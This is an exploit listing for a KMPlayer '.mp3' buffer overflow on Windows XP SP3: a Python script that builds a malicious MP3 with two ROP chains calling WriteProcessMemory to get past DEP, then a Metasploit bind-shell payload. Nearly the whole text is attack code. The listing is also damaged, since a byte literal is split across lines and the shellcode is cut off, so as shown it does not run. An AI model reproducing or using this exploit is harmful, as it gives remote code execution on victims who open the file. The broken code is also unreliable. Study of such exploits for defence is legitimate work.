The KMPlayer (Windows XP SP3) – ‘.mp3’ File Buffer Overflow (DEP Bypass)

  • 作者: dookie & ronin
    日期: 2011-06-06
  • #!/usr/bin/python
    # The KMPlayer .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
    # Downloaded from:
    # 06 Jun 11
    # Cobbled together by dookie and ronin
    # This exploit performs DEP bypass on WinXP SP3 with 2 different offsets.
    # In our testing environments, there were 2 separate offsets. One offset
    # applies to VMs running on Xen and VMware workstation for Linux. The
    # second offset applies to ESXi and VMware Fusion.
    #
    # NOTE(review): the script only builds one file (km_pwn.mp3) out of fixed
    # byte strings; every address in the chains below is hard-coded for one
    # exact set of XP SP3 system DLLs and KMPlayer plugin DLLs (in_wm.dll,
    # IN_MP3.dll, in_mp4.dll, ...). Any other DLL build, or a platform that
    # randomises module bases, leaves the chain pointing at the wrong bytes.
    # NOTE(review): this listing is damaged as reproduced here: the `head`
    # literal is wrapped across two lines and the `shellcode` tuple is cut off
    # after its first element (no closing paren), so the text as shown does
    # not parse; the truncated part is not recoverable from this page.
    import os
    evilfile = "km_pwn.mp3"
    # Crafted tag header for the .mp3. It looks like a mangled ID3v2 tag:
    # frame ids such as TIT2 / TCON / PRIV and "WM/..." frame names are
    # visible in the bytes (presumably what in_wm.dll / IN_MP3.dll parse --
    # not verifiable from this page).
    head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69
\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"
    # Single-byte padding that precedes the value named `eip` below; the
    # 3162 is one of the two environment-specific offsets mentioned above.
    cruft = "\x85" * 3162
    nops = "\x90" * 28
    nops += "\x91\x90\x90\x90"		# The last byte gets decremented in rop2 while pointing EAX at the shellcode
    nops += "\x90" * 20
    #shellcode = "\xcc" * 368		# Size of bind shell
    #root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c
    #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
    # NOTE(review): only the first element of this tuple survives on this
    # page; the remaining lines and the closing paren are missing.
    shellcode = ("\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
    ##################### ROP Chain for VMware Workstation (Linux) and Xen #####################
    eip = "\x71\x14\x40\x00"		# 00401471 RETN	Pivot to the stack
    toesp = "\x42" * 4
    # WriteProcessMemory call frame; the two placeholder dwords are patched
    # in at runtime by rop2 (see the MOV [ESI+1C] / [ESI+20] gadgets below).
    wpm = "\x13\x22\x80\x7c"		# 7C802213 WriteProcessMemory - XPSP3
    wpm += "\x20\x1f\x45\x02"		# 02451F20 in_wm.dll - Return after WPM
    wpm += "\xff\xff\xff\xff"		# hProcess
    wpm += "\x10\x1f\x45\x02"		# 02451F10 in_wm.dll - Address to Patch
    wpm += "\xbe\xba\xfe\xca"		# lpBuffer placeholder (Shellcode Address)
    wpm += "\xce\xfa\xed\xfe"		# nSize placeholder (Shellcode Size)
    wpm += "\xc0\x2b\x45\x02"		# 02452BC0 in_wm.dll - Pointer for Written Bytes
    # Get a copy of ESP into a register
    rop1 = "\x4f\x92\x71\x13"		# 1371924F :{POP}# PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll)
    rop1 += "\x41" * 12				# Junk to be popped into ESI, EBP, and EBX
    junk = "\x61" * 52				# Junk in between our VirtualProtect parameters and the next ROP chain
    # Put a copy of the saved ESP from EDI into EAX
    rop2 = "\x75\x66\x8a\x5b"		# 5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)
    rop2 += "\x41" * 8				# Compensate for the RETN 8 in rop1
    # Increase EAX to point at our shellcode
    rop2 += "\x37\x75\x37\x02"		# 02377537 :# ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
    rop2 += "\x37\x75\x37\x02"		# 02377537 :# ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
    # Write the address of the shellcode into the lpBuffer placeholder
    # First need to put EAX in a safe spot then juggle around EDI to get it to ESI
    rop2 += "\xc3\x87\xec\x76"		# 76EC87C3 :# XCHG EAX,EDX # RETN (TAPI32.dll)
    rop2 += "\x75\x66\x8a\x5b"		# 5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)
    rop2 += "\xd8\xc3\x3c\x76"		# 763CC3D8 :# XCHG EAX,ESI # RETN (comdlg32.dll)
    rop2 += "\xc3\x87\xec\x76"		# 76EC87C3 :# XCHG EAX,EDX # RETN (TAPI32.dll)
    rop2 += "\xbe\x9c\xca\x76"		# 76CA9CBE :# MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)
    rop2 += "\x41" * 4				# Junk to be popped into ESI
    # Get the initial ESP value back into ESI
    rop2 += "\xe6\x57\x01\x15"		#150157E6 :{POP}# DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll)
    rop2 += "\x41" * 8				# Junk to be popped into EBX and ECX
    # Get the initial ESP value back into ESI
    rop2 += "\xd8\xc3\x3c\x76"		# 763CC3D8 :# XCHG EAX,ESI # RETN (comdlg32.dll)
    # Zero EAX and set it to the shellcode size (0x200)
    rop2 += "\xc0\x11\x37\x02"		# 023711C0 :# XOR EAX,EAX # RETN (in_mp4.dll)
    rop2 += "\xe9\x0b\x44\x02"		# 02440BE9 :# ADD EAX,100 # POP EBP # RETN (in_wm.dll)
    rop2 += "\x41" * 4				# Junk to be popped into EBP
    rop2 += "\xe9\x0b\x44\x02"		# 02440BE9 :# ADD EAX,100 # POP EBP # RETN (in_wm.dll)
    rop2 += "\x41" * 4				# Junk to be popped into EBP
    # Write the shellcode size into the nSize placeholder
    rop2 += "\x3f\xcf\x9e\x7c"		# 7C9ECF3F :{POP}# MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll)
    rop2 += "\x41" * 8				# Junk to be popped into ESI and EBP
    # Point EAX to the WPM setup on the stack, push EAX and POP it into ESP
    rop2 += "\x41\x15\x5d\x77"		# 775D1541 :# SUB EAX,4 # RETN (ole32.dll)
    rop2 += "\x41" * 4
    rop2 += "\x51\xeb\x43\x02"		# 0243EB51 :# ADD EAX,0C # RETN (in_wm.dll)
    rop2 += "\xce\x05\x42\x02"		# 024205CE :{POP}# PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll)
    rop2 += "\x41" * 4				# Junk to be popped into ESI
    rop2 += "\x41" * 32
    ############################# ROP Chain for VMware Fusion and ESXi ############################
    ## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction
    #put this in ESI to use it for subtraction from ESP. need to land in the big buffer 14830 = 39ee
    jmp_value = "\xf0\x38\x00\x00"
    rop_1 = "\x46"*4
    #0x7744802C :# INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)**
    rop_1 += "\x2c\x80\x44\x77"
    #0x5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)**
    rop_1 += "\x75\x66\x8a\x5b"
    #0x7C926021 :{POP}# SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll)**
    rop_1 += "\x21\x60\x92\x7c"
    rop_1 += "\x50" * 8
    #0x7E451509 :# XCHG EAX,ESP # RETN (USER32.dll)**
    rop_1 += "\x09\x15\x45\x7e"
    filler_a1 = "\x41"*360
    ## ROP_2 = all about the shell
    ######### SAVING STACKPOINTERS ################################################################
    #0x7744802C :# INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)**
    rop_2 = "\x2c\x80\x44\x77"
    #0x5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)**
    rop_2 += "\x75\x66\x8a\x5b"
    #0x5B8A9F1E :# ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll)**
    rop_2 += "\x1e\x9f\x8a\x5b"
    rop_2 += "\x43\x43\x43\x43"
    #WriteProcessMemory construct with the two placeholders we need to generate on the fly
    rop_2 += "\x13\x22\x80\x7c"	#WriteProcMem - XPSP3
    rop_2 += "\x00\x2e\x98\x7c"	#ntdll - patching target
    rop_2 += "\xff\xff\xff\xff" #hProcess
    rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target
    rop_2 += "\xbe\xba\xfe\xca" #lpBuffer placeholder (Shellcode Address)
    rop_2 += "\xce\xfa\xed\xfe" #lpBuffer placeholder (Shellcode Size)
    rop_2 += "\10\x20\x98\x7c"#writeable location in ntdll
    ######### FIRST PARAM - lpBuffer placeholder (Shellcode Address)###############################
    #gadgets (plus various paddings) used to construct the memory address which will point to our shellcode
    #then we write the value to the correct memory address and restore EAX
    rop_2 += "\x44" * 40
    #0x7C974E8E :# ADD EAX,100 # POP EBP # RETN(ntdll.dll)**
    rop_2 += "\x8e\x4e\x97\x7c"
    rop_2 += "\x44" *32
    rop_2 += "\x8e\x4e\x97\x7c"
    rop_2 += "\x44"*4
    #0x7E45DA8D :# XCHG EAX,EBP # RETN (USER32.dll)**
    rop_2 += "\x8d\xda\x45\x7e"
    #0x77DD994E :# XCHG EAX,EDI # RETN 2 (ADVAPI32.dll)**
    rop_2 += "\x4e\x99\xdd\x77"
    #0x7C910C66 :# XCHG EAX,ESI # RETN 2 (ntdll.dll)**
    rop_2 += "\x66\x0c\x91\x7c"
    rop_2 += "\x44" * 2
    #0x7E45DA8D :# XCHG EAX,EBP # RETN (USER32.dll)**
    rop_2 += "\x8d\xda\x45\x7e"
    rop_2 += "\x44"*2
    rop_2 += "\xbe\x9c\xca\x76"
    ######### SIZE PARAM - lpBuffer placeholder (Shellcode Size) ##################################
    #gadgets (plus various paddings) used to construct the size value for our buffer (using 0x200 bytes)
    #then we write the value to the correct memory address and restore EAX
    rop_2 += "\x47" *4
    #0x775D156E :# PUSH EAX # POP ESI # RETN (ole32.dll)**
    rop_2 += "\x6e\x15\x5d\x77"
    #0x7E433785 :# XOR EAX,EAX # RETN 4(USER32.dll)**
    rop_2 += "\x85\x37\x43\x7e"
    #0x7C974E8E :# ADD EAX,100 # POP EBP # RETN(ntdll.dll)**
    rop_2 += "\x8e\x4e\x97\x7c"
    rop_2 += "\x45"*8
    rop_2 += "\x8e\x4e\x97\x7c"
    rop_2 += "\x45"*4
    #0x75D0AA2E :# MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN(mlang.dll)**
    rop_2 += "\x2e\xaa\xd0\x75"
    ######### Realigning EAX to point to WPM and setting ESP to it ################################
    rop_2 += "\x50" * 4
    #0x76CAF118 :# ADD EAX,0C # RETN (IMAGEHLP.dll)**
    rop_2 += "\x18\xf1\xca\x76"
    #0x7E451509 :# XCHG EAX,ESP # RETN (USER32.dll)**
    rop_2 += "\x09\x15\x45\x7e"
    rop_2 += "\x43"*316
    ##################### VARIOUS PADDINGS AND OTHER NONSENSE #####################################
    #slide into the shell
    nops_7 = "\x90"*56
    #after the shell junk
    filler_a2 = "\x42" * (3200)
    ############################# PUTTING IT TOGETHER #############################################
    filler_a = filler_a1 + rop_2 + nops_7 +shellcode +filler_a2
    #small buffer filler
    filler_b = "\x44" * (95)
    #the whole shebang (ronin's version)
    filler = filler_a+jmp_value+eip+rop_1+filler_b
    # Both environment variants are carried in the same file: the first chain
    # (eip/rop1/wpm/rop2) is laid out right after `cruft`, the second
    # (`filler`, built above) follows the first copy of the shellcode.
    sploit = head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops + shellcode + filler
    # NOTE(review): text-mode open; this relies on Python 2 semantics where a
    # str literal is already bytes. Under Python 3 the non-ASCII escapes would
    # be re-encoded on write and the output would differ. The write/close of
    # `crashy` continue past the end of this listing.
    crashy = open(evilfile,"w")